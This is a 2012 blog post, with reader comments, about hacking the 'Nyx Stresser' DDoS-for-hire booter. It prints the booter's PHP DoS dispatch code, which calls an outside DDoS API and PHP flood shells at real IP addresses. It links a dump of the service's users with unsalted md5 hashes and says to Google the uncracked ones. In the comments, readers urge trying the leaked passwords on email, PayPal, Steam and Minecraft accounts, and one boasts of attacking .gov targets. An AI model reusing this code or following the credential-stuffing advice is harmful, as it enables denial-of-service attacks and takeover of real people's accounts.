Thursday, December 13, 2012

Nyx Stresser


http://www.hackforums.net/showthread.php?tid=2899035

One of many shitty "booters". Took it down just now.



I'm not going to release the source because that would simply encourage skids to copy and paste it and make their own. Here's the core DoS logic though, from "hub.php":

@file_get_contents("http://atomicapi.net/send.php?key={$keyBoot}&host={$host}&port={$port}&time={$time}");

$select = mysql_query("SELECT * FROM shells WHERE status = 'up'");
//shells = "http://95.211.186.68/sudp.php", "http://178.18.19.122/sno.php"

while ($item = mysql_fetch_array($select)) {
    $ch = curl_init($item['url']."?act=phptools&type=".$type."&host=".$host."&time=".$time."&port=".$port);
}
So it uses the "atomic API" DDoS service plus two PHP DoS shells on cheap VPSs rented by the owner. Very sophisticated.

Here's the user table from the database. All password hashes are unsalted md5. Some already cracked. For the ones that I was too lazy to crack, try Googling the hash and you'll have a decent success rate.

Account Dump:
http://pastebay.net/1173575

13 comments:

  1. This comment has been removed by the author.

    ReplyDelete
  2. Wow that's a shame, at least you got the source and the account data base.

    ReplyDelete
  3. This comment has been removed by the author.

    ReplyDelete
  4. He set up accounts again. Some accounts worked. Idiot didn't blacklist .gov so I had a little fun >:)

    ReplyDelete
  5. Good job.

    Try the passwords on their emails and HF accounts as well. You'll probably have a pretty high success rate.

    ReplyDelete
    Replies
    1. Try them on steam, minecraft and paypal too. I got some MC accounts from when vdoss was hacked.

      Delete
  6. They also have Paypal accounts and LR. HF accounts are worthless :>

    ReplyDelete
  7. Mind is blown... I've done MIPS and a bit of x86, but not much, and a little bit of ARM, but they're all a little different. And it doesn't necessarily help much when other people can make insane spagetti code like in that hubs.php that's meant to drive you wonky!

    ReplyDelete
  8. What'd you use to hack into the admin panel?

    ReplyDelete
  9. Good job and all. But I don't see why you aren't focusing on stress testers that are just straight up horrible. Such as Vdoss, XrShit and Atomic Shit (the owner tried to ddos me once, hahaha!)
    It went something like this:
    Me: fix your damn stress tester or i am filing a scam report
    Retarded American: ok one moment
    Retarded American:
    He then blocked me after I trolled him.

    ReplyDelete
  10. Mad props. Keep up the good work.

    ReplyDelete
  11. Haha, Admin the booter sucked yeah, the owner is also idiot.

    ReplyDelete